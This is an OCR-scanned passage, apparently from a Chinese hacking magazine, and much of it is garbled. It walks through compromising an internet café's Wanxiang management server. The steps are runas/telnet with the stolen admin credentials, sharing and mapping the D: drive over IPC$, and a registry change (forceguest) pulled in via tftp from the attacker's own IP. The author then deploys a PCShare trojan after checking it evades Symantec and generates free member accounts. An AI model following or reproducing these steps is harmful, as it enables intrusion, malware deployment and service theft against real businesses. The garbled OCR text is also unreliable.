如发现有乱码， 请直接从这里浏览原文
正文摘录:

帐户和密码，然后在CMD下输人命令：runa$／useradministratortelnet，提示输入密码，我们输入MZDl23图9接下来寻找一下万象的数据库文件，在I)盘发现了octopus目求(图lO).输入netshareb=d：就把D盘给共享了(图11)。在本机中使用管理员帐号新建一个IPC连接.接着输入netusej：＼＼192.16B.I.213＼b，映射了对方的D盘。：＼＞dird=鬈韶擘艄掌嚣一黧卷的序列号是№i一而辐D“的目录aB7—03一t1719：5S-明7—日3一日7l，：S6明7a6—17日，：14帕7一∞一20日7：S6哪一10—2414：37B07一a3一日71口：13Bl~7-e3—舯1日：12Be?—日3一绷日7：i41，677，71'，235DISXC.GH0226.053，B29DIsKce61.GHS＜DIR＞Exj‘x?2e。。m13.2。=：兰墨嚣兰：：：＜DIR＞~ad：in3.2750.496radmtn3.2mp图11为了试下这个目录是否可写，我在里面新建了一个文本文俏，却提示拒绝访问(图l2)，于是又把本地注册表HKEYj。OCALMACHINE＼SYSTEM＼CurrentControlSctControlkLsa的forceguest的值改为0.再导出到a.reg(即把“仅来宾验证”改为。经典登录”)，使刚tftp—i192.168.1.18gets.reg(192.168.1.18是我的本地IP地址)传到肉鸡.k，执行regedit／Se-reg导入。一切部是悄无声息的进行着。再新建文件试试，仍然失败，这个Win2003还真难搞(这里佴多说一句，wiIIxIJsp2中默认的是“仅来宾验证”.所以即使用正确的管理员帐号和密码建立了ipC$连接，也没有刷，叉lf们可以在肉鸡上导入这个a.reg来解决问题)。看来只好使用木马了，不过这招要慎用，一不小心传过去主机报毒，那可就全完了，所以我在开卡上机时留意了一图12下那个主机上的杀毒软件，发现是symantecntivirus，，我马j二从网上下载了一个放在本地，再更新病毒库进行木马检查，发现pCShare的服务端对此不感冒，所以决定就使用它了。生成一个名为a.exe的术马服务端，传到肉鸡k，再在shell里执行sterte.exe。哈在文件管理里打开d：＼octopus，里面有个叫做CFC8rds.exe的东西，我们用它来生成一个会员帐号(图l4).叉子们知道怎么做了吧，不过要注意crcards.exe是被下载到本地的C：＼temp中图13执行的，所以生成帐号后要记得弄回去。如果要更改他的数据库的话，建议使用d0Inain，它集破解密码与打开数据于一身(图15，图16)。